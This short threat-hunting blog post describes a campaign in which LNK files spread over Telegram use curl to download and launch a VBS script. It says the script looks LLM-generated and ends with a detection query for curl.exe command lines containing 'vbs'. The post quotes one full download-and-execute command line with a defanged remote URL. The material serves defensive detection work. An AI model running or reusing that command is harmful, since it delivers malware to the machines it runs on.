168. Adversaries Abuse LLM to Generate Malicious Scripts
Hello everyone!
I'm sure you already use LLMs to solve various security-related tasks. So do adversaries! For example, let's look at a campaign uncovered by Qianxin Threat Intelligence Center.
The threat actors used Telegram to distribute archives with malicious LNK-files. These files abused cURL to download a malicious .vbs file from a remote server, for example:
C:\Windows\System32\cmd.exe /c "curl -o C:\Users\Public\aa.vbs https://zl-web-images[.]oss-cn-shenzhen[.]aliyuncs[.]com/5C25D918A2314DA2AC8D3C704287E278.vbs && start C:\Users\Public\aa.vbs"
Here we have a nice hunting opportunity:
event_type: "processcreatewin"
AND
proc_file_name: "curl.exe"
AND
cmdline: "vbs"
So, if we look inside the .vbs file, we can see that it's very similar to those created with LLMs! That's it!
See you tomorrow!
Comments
Post a Comment